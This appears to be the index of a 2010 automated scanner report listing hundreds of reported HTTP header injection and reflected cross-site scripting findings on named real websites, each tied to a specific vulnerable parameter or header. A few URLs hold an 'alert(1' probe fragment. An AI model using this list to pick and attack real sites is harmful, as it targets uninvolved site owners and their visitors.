Report generated by Hoyt LLC at Thu Nov 25 08:40:55 CST 2010.


The DORK Report

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/adj/can.en.aff.packseek/ [REST URL parameter 1]

1.2. http://adc2.adcentriconline.com/adcentric/form/1679/2/48846 [ADCUserID cookie]

1.3. http://adc2.adcentriconline.com/adcentric/tag/1679/1/48846 [ADCUserID cookie]

1.4. http://bs.serving-sys.com/BurstingPipe/AdServer.bs [gclid parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [adurl parameter]

2.2. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [adurl parameter]

2.3. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [ai parameter]

2.4. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [ai parameter]

2.5. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [client parameter]

2.6. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [client parameter]

2.7. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [num parameter]

2.8. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [num parameter]

2.9. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sig parameter]

2.10. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sig parameter]

2.11. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sz parameter]

2.12. http://ad.doubleclick.net/adj/N5552.3159.GOOGLECN.COM/B4896920.18 [sz parameter]

2.13. http://adc2.adcentriconline.com/adcentric/form/1679/2/48846 [name of an arbitrarily supplied request parameter]

2.14. http://ads.gmodules.com/gadgets/ifr [url parameter]

2.15. http://alumni.utoronto.ca/s/731/index.aspx [gid parameter]

2.16. http://alumni.utoronto.ca/s/731/index.aspx [sid parameter]

2.17. http://blogs.canoe.ca/autonet/ [name of an arbitrarily supplied request parameter]

2.18. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [REST URL parameter 2]

2.19. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [REST URL parameter 3]

2.20. http://blogs.canoe.ca/canoedossier/media-matters/internet-overload/ [name of an arbitrarily supplied request parameter]

2.21. http://blogs.canoe.ca/canoetech/ [name of an arbitrarily supplied request parameter]

2.22. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [REST URL parameter 2]

2.23. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [REST URL parameter 3]

2.24. http://blogs.canoe.ca/ent/general/cookie-monster-lobbies-for-snl-gig/ [name of an arbitrarily supplied request parameter]

2.25. http://blogs.canoe.ca/loadthis/ [name of an arbitrarily supplied request parameter]

2.26. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [REST URL parameter 2]

2.27. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [REST URL parameter 3]

2.28. http://blogs.canoe.ca/travel/vacation-time/is-the-airport-experience-too-intrusive/ [name of an arbitrarily supplied request parameter]

2.29. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [REST URL parameter 2]

2.30. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [REST URL parameter 3]

2.31. http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/ [name of an arbitrarily supplied request parameter]

2.32. http://blogs.constantcontact.com/commentary [name of an arbitrarily supplied request parameter]

2.33. http://ca.indeed.com/Ajilon-Consulting-jobs-in-Montréal,-QC [name of an arbitrarily supplied request parameter]

2.34. http://chealth.canoe.ca/health_news_details.asp [news_id parameter]

2.35. http://chealth.canoe.ca/health_news_details.asp [news_id parameter]

2.36. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.37. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

2.39. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

2.40. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]

2.41. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]

2.42. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]

2.43. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 3]

2.44. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]

2.45. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]

2.46. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]

2.47. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 3]

2.48. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]

2.49. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]

2.50. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]

2.51. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 3]

2.52. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]

2.53. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]

2.54. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]

2.55. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 3]

2.56. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]

2.57. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]

2.58. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]

2.59. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 3]

2.60. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 2]

2.61. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 2]

2.62. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 [REST URL parameter 3]

2.63. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]

2.64. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]

2.65. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 2]

2.66. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/price-is-right-moron/11860998001 [REST URL parameter 3]

2.67. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]

2.68. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]

2.69. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 2]

2.70. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 [REST URL parameter 3]

2.71. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]

2.72. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]

2.73. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 2]

2.74. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 [REST URL parameter 3]

2.75. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]

2.76. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]

2.77. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 2]

2.78. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/wheel-of-fortune-one-letter-winner/670340060001 [REST URL parameter 3]

2.79. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]

2.80. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]

2.81. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 2]

2.82. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/worst-family-feud-answer-ever/35607309001 [REST URL parameter 3]

2.83. https://events.deloitte-canada.12hna.com/preferences/ [REST URL parameter 1]

2.84. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us [REST URL parameter 6]

2.85. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us [REST URL parameter 6]

2.86. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html [REST URL parameter 6]

2.87. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/contact.html [REST URL parameter 6]

2.88. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/privacy_policy.html [REST URL parameter 6]

2.89. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html [REST URL parameter 6]

2.90. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/about_us/terms.html [REST URL parameter 6]

2.91. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html [REST URL parameter 6]

2.92. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html [REST URL parameter 6]

2.93. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries [REST URL parameter 6]

2.94. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries [REST URL parameter 6]

2.95. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html [REST URL parameter 6]

2.96. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html [REST URL parameter 6]

2.97. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]

2.98. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]

2.99. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]

2.100. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html [REST URL parameter 6]

2.101. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html [REST URL parameter 6]

2.102. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html [REST URL parameter 6]

2.103. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html [REST URL parameter 6]

2.104. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techrecovery.html [REST URL parameter 6]

2.105. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06 [REST URL parameter 6]

2.106. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06 [REST URL parameter 6]

2.107. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/ [REST URL parameter 6]

2.108. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/ [REST URL parameter 6]

2.109. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us [REST URL parameter 6]

2.110. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us [REST URL parameter 6]

2.111. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html [REST URL parameter 6]

2.112. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html [REST URL parameter 6]

2.113. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/distribution_finance.html [REST URL parameter 6]

2.114. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html [REST URL parameter 6]

2.115. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html [REST URL parameter 6]

2.116. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/index.html [REST URL parameter 6]

2.117. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/terms.html [REST URL parameter 6]

2.118. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html [REST URL parameter 6]

2.119. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/government.html [REST URL parameter 6]

2.120. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html [REST URL parameter 6]

2.121. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/purchase_order.html [REST URL parameter 6]

2.122. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html [REST URL parameter 6]

2.123. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/real_estate.html [REST URL parameter 6]

2.124. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html [REST URL parameter 6]

2.125. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/third_party.html [REST URL parameter 6]

2.126. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html [REST URL parameter 6]

2.127. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/financial_products/all_products/trans.html [REST URL parameter 6]

2.128. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html [REST URL parameter 6]

2.129. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/index.html [REST URL parameter 6]

2.130. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]

2.131. http://guide.opendns.com/ [name of an arbitrarily supplied request parameter]

2.132. http://guide.opendns.com/main [url parameter]

2.133. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 1]

2.134. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 2]

2.135. http://navbar.api.canoe.ca/v1/navbar/partenaire+tourismexchange [REST URL parameter 3]

2.136. http://waterlookiosk.com/directory.php [categoryId parameter]

2.137. http://waterlookiosk.com/directory.php [categoryId parameter]

2.138. http://wikitravel.org/en/Toronto/x22 [REST URL parameter 2]

2.139. http://wikitravel.org/en/Toronto/x22 [REST URL parameter 3]

2.140. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 2]

2.141. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 3]

2.142. http://wikitravel.org/en/Toronto/x22cfc88/%27%253Balert(1 [REST URL parameter 4]

2.143. http://wikitravel.org/en/Torontoa333e/%27%253Balert(1 [REST URL parameter 2]

2.144. http://wikitravel.org/en/Torontoa333e/%27%253Balert(1 [REST URL parameter 3]

2.145. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.146. http://www.addthis.com/bookmark.php [REST URL parameter 1]

2.147. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.148. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

2.149. http://www.addthis.com/bookmark.php [pub parameter]

2.150. http://www.addthis.com/bookmark.php [v parameter]

2.151. http://www.autonet.ca/autos/search/testdrives/ [REST URL parameter 2]

2.152. http://www.calgarykiosk.ca/directory.php [categoryId parameter]

2.153. http://www.clickonf5.org/ [name of an arbitrarily supplied request parameter]

2.154. http://www.constantcontact.com/_script/clickpathmedia.js [REST URL parameter 1]

2.155. http://www.constantcontact.com/_script/default/javascript.js [REST URL parameter 1]

2.156. http://www.constantcontact.com/_script/excanvas.compiled.js [REST URL parameter 1]

2.157. http://www.constantcontact.com/_script/footnoteLinks.js [REST URL parameter 1]

2.158. http://www.constantcontact.com/_script/includes/js/mbox.js [REST URL parameter 1]

2.159. http://www.constantcontact.com/_script/jquery/jquery-1.3.2.js [REST URL parameter 1]

2.160. http://www.constantcontact.com/_script/s_code.js [REST URL parameter 1]

2.161. http://www.constantcontact.com/_script/social-media-toolbar.js [REST URL parameter 1]

2.162. http://www.constantcontact.com/analytics/omniture.jsp [REST URL parameter 1]

2.163. http://www.constantcontact.com/analytics/omniture.jsp [REST URL parameter 2]

2.164. http://www.constantcontact.com/community [REST URL parameter 1]

2.165. http://www.constantcontact.com/default/javascript.js [REST URL parameter 1]

2.166. http://www.constantcontact.com/default/javascript.js [REST URL parameter 2]

2.167. http://www.constantcontact.com/email-marketing/index.jsp [REST URL parameter 1]

2.168. http://www.constantcontact.com/email-marketing/index.jsp [REST URL parameter 2]

2.169. http://www.constantcontact.com/event-marketing/index.jsp [REST URL parameter 1]

2.170. http://www.constantcontact.com/event-marketing/index.jsp [REST URL parameter 2]

2.171. http://www.constantcontact.com/favicon.ico [REST URL parameter 1]

2.172. http://www.constantcontact.com/features/signup.jsp [REST URL parameter 1]

2.173. http://www.constantcontact.com/features/signup.jsp [REST URL parameter 2]

2.174. http://www.constantcontact.com/footer_quote.jsp [REST URL parameter 1]

2.175. http://www.constantcontact.com/footer_quote.jsp [REST URL parameter 1]

2.176. http://www.constantcontact.com/global-login.jsp [REST URL parameter 1]

2.177. http://www.constantcontact.com/global-nav.jsp [REST URL parameter 1]

2.178. http://www.constantcontact.com/index.jsp [REST URL parameter 1]

2.179. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 1]

2.180. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 2]

2.181. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 3]

2.182. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [REST URL parameter 4]

2.183. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 1]

2.184. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 2]

2.185. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 3]

2.186. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [REST URL parameter 4]

2.187. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 1]

2.188. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 2]

2.189. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [REST URL parameter 3]

2.190. http://www.constantcontact.com/learning-center/index.jsp [REST URL parameter 1]

2.191. http://www.constantcontact.com/learning-center/index.jsp [REST URL parameter 2]

2.192. http://www.constantcontact.com/local/index.jsp [REST URL parameter 1]

2.193. http://www.constantcontact.com/login.jsp [REST URL parameter 1]

2.194. http://www.constantcontact.com/media/pdf/get-started-building-your-social-media-presence.pdf [REST URL parameter 1]

2.195. http://www.constantcontact.com/online-surveys/index.jsp [REST URL parameter 1]

2.196. http://www.constantcontact.com/online-surveys/index.jsp [REST URL parameter 2]

2.197. http://www.constantcontact.com/partners/index.jsp [REST URL parameter 1]

2.198. http://www.constantcontact.com/partners/index.jsp [REST URL parameter 2]

2.199. http://www.constantcontact.com/privacy_guarantee.jsp [REST URL parameter 1]

2.200. http://www.constantcontact.com/safesubscribe.jsp [REST URL parameter 1]

2.201. http://www.constantcontact.com/search/index.jsp [REST URL parameter 1]

2.202. http://www.constantcontact.com/search/index.jsp [REST URL parameter 2]

2.203. http://www.constantcontact.com/social-media-for-small-business/index.jsp [REST URL parameter 1]

2.204. http://www.constantcontact.com/social-media-for-small-business/index.jsp [REST URL parameter 2]

2.205. http://www.cornwallkiosk.com/directory.php [categoryId parameter]

2.206. http://www.destech.com/registerme.asp [category parameter]

2.207. http://www.edmontonkiosk.ca/directory.php [categoryId parameter]

2.208. http://www.eironclad.com/contact-us/index.php [name of an arbitrarily supplied request parameter]

2.209. http://www.fastcompany.com/1699391/what-helps-small-business-grow-its-still-email [name of an arbitrarily supplied request parameter]

2.210. http://www.findmylocaljob.net/profile.php [f parameter]

2.211. http://www.findmylocaljob.net/profile.php [f parameter]

2.212. http://www.findmylocaljob.net/profile.php [kw parameter]

2.213. http://www.findmylocaljob.net/profile.php [kw parameter]

2.214. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]

2.215. http://www.findmylocaljob.net/profile.php [name of an arbitrarily supplied request parameter]

2.216. http://www.ford.ca/app/fo/en/parts_and_services/offers/works.do [REST URL parameter 5]

2.217. http://www.fullsail.edu/index.cfm [kw parameter]

2.218. http://www.gahtan.com/cgi/cdnlaw/jump.cgi [ID parameter]

2.219. http://www.getdecorating.com/ [name of an arbitrarily supplied request parameter]

2.220. http://www.halifaxkiosk.com/directory.php [categoryId parameter]

2.221. http://www.hamiltonkiosk.ca/directory.php [categoryId parameter]

2.222. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

2.223. http://www.hotelsoup.com/hotel.php [name of an arbitrarily supplied request parameter]

2.224. http://www.ihirequalitycontrol.com/t-QC-jobs-listed.html [REST URL parameter 1]

2.225. http://www.jobboom.com/ [name of an arbitrarily supplied request parameter]

2.226. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 1]

2.227. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 2]

2.228. http://www.joostdevalk.nl/code/sortable-table/. [REST URL parameter 3]

2.229. http://www.kayak.com/in [url parameter]

2.230. http://www.kayak.com/in [url parameter]

2.231. http://www.kelownakiosk.com/directory.php [categoryId parameter]

2.232. http://www.kitchenerkiosk.com/directory.php [categoryId parameter]

2.233. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]

2.234. http://www.legalaid.on.ca/en/getting/ [name of an arbitrarily supplied request parameter]

2.235. http://www.londonkiosk.ca/directory.php [categoryId parameter]

2.236. http://www.montrealkiosk.com/directory.php [%20Services&categoryId parameter]

2.237. http://www.montrealkiosk.com/directory.php [categoryId parameter]

2.238. http://www.nationalpost.com/x22 [REST URL parameter 1]

2.239. http://www.refcodeanalytics.com/js/trackerCode.js [REST URL parameter 1]

2.240. http://www.refcodeanalytics.com/js/trackerCode.js [REST URL parameter 2]

2.241. http://www.refcodeanalytics.com/process/backend1.php [REST URL parameter 1]

2.242. http://www.refcodeanalytics.com/process/backend1.php [REST URL parameter 2]

2.243. http://www.refcodeanalytics.com/process/backend1.php [callback parameter]

2.244. http://www.refcodeanalytics.com/process/backend1.php [client parameter]

2.245. http://www.refcodeanalytics.com/process/backend1.php [track parameter]

2.246. http://www.scbt.ca/Diploma/Certificate%20Request.html [REST URL parameter 1]

2.247. http://www.sqlpower.ca/page/search [q parameter]

2.248. http://www.sqlpower.ca/page/store [category parameter]

2.249. http://www.sqlpower.ca/page/store [category parameter]

2.250. https://www.sqlpower.ca/page/edit_cart [addItem parameter]

2.251. http://www.thebans.com/it/index.asp [l parameter]

2.252. http://www.thebans.com/it/index.asp [s parameter]

2.253. http://www.thebans.com/it/index.asp [t parameter]

2.254. http://mysite.com/accordion.htm [Referer HTTP header]

2.255. http://remysharp.com/ [Referer HTTP header]

2.256. https://utoronto.imodules.com/s/731/index.aspx [Referer HTTP header]

2.257. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.258. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.259. http://www.brickred.com/ [Referer HTTP header]

2.260. http://www.brickred.com/offering/ [Referer HTTP header]

2.261. http://www.brickred.com/offering/CommodityTrading.jsp [Referer HTTP header]

2.262. http://www.brickred.com/offering/Custom_Application_Development.jsp [Referer HTTP header]

2.263. http://www.brickred.com/offering/DocumentControl.jsp [Referer HTTP header]

2.264. http://www.brickred.com/offering/ForexTrading.jsp [Referer HTTP header]

2.265. http://www.brickred.com/offering/IT_Consulting_Firms.jsp [Referer HTTP header]

2.266. http://www.brickred.com/offering/PortfolioManagement.jsp [Referer HTTP header]

2.267. http://www.brickred.com/offering/Request.jsp [Referer HTTP header]

2.268. http://www.brickred.com/offering/Technologies-lamp.jsp [Referer HTTP header]

2.269. http://www.brickred.com/offering/TravelPortal.jsp [Referer HTTP header]

2.270. http://www.brickred.com/offering/about_us.jsp [Referer HTTP header]

2.271. http://www.brickred.com/offering/ajax_generic.jsp [Referer HTTP header]

2.272. http://www.brickred.com/offering/application_migration.jsp [Referer HTTP header]

2.273. http://www.brickred.com/offering/award.jsp [Referer HTTP header]

2.274. http://www.brickred.com/offering/contact_information.jsp [Referer HTTP header]

2.275. http://www.brickred.com/offering/documentum_technology.jsp [Referer HTTP header]

2.276. http://www.brickred.com/offering/failure_outsourcing.jsp [Referer HTTP header]

2.277. http://www.brickred.com/offering/functional_testing.jsp [Referer HTTP header]

2.278. http://www.brickred.com/offering/index.jsp [Referer HTTP header]

2.279. http://www.brickred.com/offering/index.jsp [Referer HTTP header]

2.280. http://www.brickred.com/offering/java_technology.jsp [Referer HTTP header]

2.281. http://www.brickred.com/offering/load_testing.jsp [Referer HTTP header]

2.282. http://www.brickred.com/offering/net_technology.jsp [Referer HTTP header]

2.283. http://www.brickred.com/offering/offshoring_roi.jsp [Referer HTTP header]

2.284. http://www.brickred.com/offering/outsourcing.jsp [Referer HTTP header]

2.285. http://www.brickred.com/offering/overview.jsp [Referer HTTP header]

2.286. http://www.brickred.com/offering/plan_outsource.jsp [Referer HTTP header]

2.287. http://www.brickred.com/offering/privacy_policy.jsp [Referer HTTP header]

2.288. http://www.brickred.com/offering/product_maintenance.jsp [Referer HTTP header]

2.289. http://www.brickred.com/offering/sharepoint.jsp [Referer HTTP header]

2.290. http://www.brickred.com/offering/software_development.jsp [Referer HTTP header]

2.291. http://www.brickred.com/offering/technologies.jsp [Referer HTTP header]

2.292. http://www.brickred.com/offering/test_automation.jsp [Referer HTTP header]

2.293. http://www.brickred.com/offering/test_planning.jsp [Referer HTTP header]

2.294. http://www.brickred.com/offering/testing_lab.jsp [Referer HTTP header]

2.295. http://www.brickred.com/offering/testing_services.jsp [Referer HTTP header]

2.296. http://www.brickred.com/offering/thankyou.jsp [Referer HTTP header]

2.297. http://www.brickred.com/offering/why_outsource.jsp [Referer HTTP header]

2.298. http://www.constantcontact.com/ [Referer HTTP header]

2.299. http://www.constantcontact.com/analytics/omniture.jsp [Referer HTTP header]

2.300. http://www.constantcontact.com/email-marketing/index.jsp [Referer HTTP header]

2.301. http://www.constantcontact.com/event-marketing/index.jsp [Referer HTTP header]

2.302. http://www.constantcontact.com/index.jsp [Referer HTTP header]

2.303. http://www.constantcontact.com/index.jsp [Referer HTTP header]

2.304. http://www.constantcontact.com/learning-center/glossary/social-media/index.jsp [Referer HTTP header]

2.305. http://www.constantcontact.com/learning-center/hints-tips/em/social.jsp [Referer HTTP header]

2.306. http://www.constantcontact.com/learning-center/hints-tips/ht-2010-05b.jsp [Referer HTTP header]

2.307. http://www.constantcontact.com/learning-center/index.jsp [Referer HTTP header]

2.308. http://www.constantcontact.com/local/index.jsp [Referer HTTP header]

2.309. http://www.constantcontact.com/media/pdf/get-started-building-your-social-media-presence.pdf [Referer HTTP header]

2.310. http://www.constantcontact.com/online-surveys/index.jsp [Referer HTTP header]

2.311. http://www.constantcontact.com/partners/index.jsp [Referer HTTP header]

